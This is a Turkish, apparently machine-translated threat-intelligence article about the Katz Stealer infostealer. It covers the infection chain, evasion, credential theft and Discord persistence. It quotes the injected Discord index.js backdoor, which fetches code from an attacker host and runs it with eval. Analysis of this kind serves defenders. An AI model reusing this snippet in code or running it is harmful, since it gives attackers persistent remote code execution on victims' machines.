Katz Stealer olarak bilinen gelişmiş yeni bilgi çalan kötü amaçlı yazılımlar 2025 yılında ortaya çıktı ve Discord gibi popüler uygulamaları hedefleyen yenilikçi kalıcılık mekanizmalarıyla birlikte gelişmiş kimlik hırsızlığı yeteneklerini gösterdi.
Hizmet olarak kötü amaçlı yazılım (MAAS) platformu, siber suçlu araç setlerinde önemli bir evrimi temsil eder ve tehdit aktörlerine sistemleri tehlikeye atmak ve birden fazla platform ve uygulamada hassas verileri çalmak için erişilebilir ama güçlü bir araç sunar.
Öncelikle kimlik avı kampanyaları ve gizlenmiş yazılım indirmeleri aracılığıyla dağıtılan Katz Stealer, GZIP arşivlerinde gizlenmiş yoğun bir şekilde gizlenmiş JavaScript damlalarıyla başlayan çok aşamalı bir enfeksiyon zinciri kullanıyor.
.png
)
Kötü amaçlı yazılımın ilk yükü, statik analiz ve otomatik algılama sistemlerinden kaçınmak için tür zorlama ve polimorfik dize yapısı da dahil olmak üzere sofistike gizleme tekniklerinden yararlanır.
Yürütüldükten sonra, JavaScript damlası, sonraki yükleri indirmek ve yürütmek için PowerShell’i gizli pencere parametreleriyle çağırır ve kötü amaçlı yazılımların gizli operasyonlara olan bağlılığını gösterir.
Picus güvenlik araştırmacıları, Katz Stealer’ın geliştiricilerinin, kötü amaçlı yazılımın analiz ortamlarını algılamasını ve bunlardan kaçınmasını sağlayan gelişmiş sistem parmak izi yeteneklerini dahil ettiğini belirtti.
.webp)
Tehdit, özellikle Bağımsız Devletler (CIS) ülkelerinin Topluluğu dışındaki sistemleri hedefleyen kapsamlı coğrafi işleme kontrolleri gerçekleştirirken, potansiyel kum havuzu veya sanal makine ortamlarını tanımlamak için ekran çözünürlüğü, BIOS bilgileri ve sistem çalışma süresi gibi sistem özelliklerini aynı anda değerlendiriyor.
Bu çok katmanlı algılama kaçınma stratejisi, güvenlik araştırma çabalarını önemli ölçüde karmaşıklaştırır ve kötü amaçlı yazılımların üretim ortamlarında daha etkili bir şekilde çalışmasını sağlar.
Kötü amaçlı yazılımın etkisi, kimlik bilgisi çıkarma, kripto para birimi cüzdan uygulamaları, mesajlaşma platformları ve e -posta istemcileri için 78’den fazla tarayıcı varyantını hedefleyen çok sayıda saldırı vektörüne uzanır.
Katz Stealer’ın kapsamlı veri hırsızlığı yetenekleri, aynı zamanda oturum belirteçlerini, kaydedilmiş şifreleri ve hatta ödün verilen sistemlerden kredi kartı bilgilerini toplarken, Chrome’un uygulamaya bağlı şifrelemeyi (ABE) atlatma yer alıyor.
Kalıcı komut ve kontrol kanalları aracılığıyla çalınan verilerin derhal eksfiltrasyonu, tehdit aktörlerinin, enfeksiyon uzlaştıktan kısa bir süre sonra keşfedilip iyileştirilse bile saldırılarından hızlı bir şekilde para kazanabilmesini sağlar.
Discord Uygulama Kaçırımı: Yeni Bir Kalıcılık Stratejisi
Katz Stealer’ın en yenilikçi özelliklerinden biri, kalıcı arka kapı erişimi oluşturmak için Discord masaüstü uygulamasının manipülasyonunu içerir.
Kötü amaçlı yazılım, uygulamanın kurulum dizinini bularak ve App.asar arşivini değiştirerek, özellikle Discord’un başlatma işlemi sırasında yürütülen index.js dosyasına kötü amaçlı kod enjekte ederek Discord tabanlı mimarisini hedefler.
Enjekte edilen kod, meşru görünüşte anlaşmazlık ağ etkinliği yoluyla saldırgan kontrollü altyapı ile gizli bir iletişim kanalı oluşturur.
Kötü amaçlı yazılım, ayırt edici “Katz-Ontop” tanımlayıcısını dahil ederken Chrome tarayıcı trafiğini taklit eden özel bir kullanıcı ajanı dize kullanarak HTTPS istekleri gerçekleştiren bir JavaScript snippet’i ekler.
Bu yaklaşım özellikle sinsidir, çünkü güvenilir bir uygulamayı kalıcı bir arka kapı mekanizmasına dönüştürür.
require('https').request({
hostname: 'twist2katz.com',
path: '/api/getapicn?key=%s',
headers: {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop'
}
}, r => {
let d = '';
r.on('data', c => d += c);
r.on('end', () => eval(d));
}).end();Bu kalıcılık mekanizması özellikle etkili olduğunu kanıtlamaktadır, çünkü uyumsuzluk sıklıkla sistem başlatılmasında başlatılır ve birincil kötü amaçlı yazılım işlemi sona erdiğinde bile arka kapı bağlantısını otomatik olarak yeniden oluşturur.
Yaklaşım, saldırganlara gelecekteki işlemler, kod dağıtım veya ek veri açığa çıkma faaliyetleri için sistem erişimini sürdürmenin güvenilir bir yolunu sunarken kullanıcıların uyumsuzluğa olan güvenini artırır.
Herhangi biriyle tehdit tepkisini otomatikleştirin. -> Tam erişim isteyin